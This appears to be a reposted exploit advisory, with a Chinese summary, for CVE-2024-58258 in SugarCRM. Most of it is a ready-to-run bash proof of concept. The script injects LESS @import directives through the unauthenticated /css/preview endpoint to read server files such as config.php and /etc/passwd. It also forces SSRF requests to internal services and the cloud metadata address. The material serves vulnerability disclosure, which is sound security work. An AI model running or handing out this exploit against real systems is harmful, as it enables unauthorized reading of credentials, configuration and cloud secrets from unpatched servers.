SugarCRM 14.0.0 SSRF/Code Injection
SugarCRM 14.0.0版本存在未正确清理输入的漏洞,允许远程未认证攻击者通过GET参数注入LESS代码并执行任意指令。攻击者可利用@import语句触发SSRF或读取服务器本地文件,可能导致敏感信息泄露。该漏洞影响所有商业版本低于13.0.4和14.0.1的SugarCRM。 2025-8-11 20:49:39 Author: cxsecurity.com(查看原文) 阅读量:18 收藏

# Exploit Title : SugarCRM 14.0.0 - SSRF/Code Injection # Author: Egidio Romano aka EgiX # Email : [email protected] # Software Link: https://www.sugarcrm.com # Affected Versions: All commercial versions before 13.0.4 and 14.0.1. # CVE Reference: CVE-2024-58258 # Vulnerability Description: User input passed through GET parameters to the /css/preview REST API endpoint is not properly sanitized before parsing it as LESS code. This can be exploited by remote, unauthenticated attackers to inject and execute arbitrary LESS directives. By abusing the @import LESS statement, an attacker can trigger Server-Side Request Forgery (SSRF) or read arbitrary local files on the web server, potentially leading to the disclosure of sensitive information. # Proof of Concept: #!/bin/bash echo echo "+----------------------------------------------------------------------+"; echo "| SugarCRM <= 14.0.0 (css/preview) LESS Code Injection Exploit by EgiX |"; echo "+----------------------------------------------------------------------+"; if [ "$#" -ne 2 ]; then echo -ne "\nUsage.....: $0 <SugarCRM URL> <Local File or SSRF URL>\n" echo -ne "\nExample...: $0 'http://localhost/sugarcrm/' 'config.php'" echo -ne "\nExample...: $0 'http://localhost/sugarcrm/' '/etc/passwd'" echo -ne "\nExample...: $0 'https://www.sugarcrm.com/' 'http://localhost:9200/_search'" echo -ne "\nExample...: $0 'https://www.sugarcrm.com/' 'http://169.254.169.254/latest/meta-data/'\n\n" exit 1 fi urlencode() { echo -n "$1" | xxd -p | tr -d '\n' | sed 's/../%&/g' } INJECTION=$(urlencode "1; @import (inline) '$2'; @import (inline) 'data:text/plain,________';//") RESPONSE=$(curl -ks "${1}rest/v10/css/preview?baseUrl=1&param=${INJECTION}") if echo "$RESPONSE" | grep -q "________"; then echo -e "\nOutput for '$2':\n" echo "$RESPONSE" | sed '/________/q' | grep -v '________' echo else echo -e "\nError: exploit failed!\n" exit 2 fi # Credits: Vulnerability discovered by Egidio Romano. # Original Advisory: http://karmainsecurity.com/KIS-2025-04 # Other References: https://support.sugarcrm.com/resources/security/sugarcrm-sa-2024-059/



 

Thanks for you comment!
Your message is in quarantine 48 hours.


文章来源: https://cxsecurity.com/issue/WLB-2025080008
如有侵权请联系:admin#unsafe.sh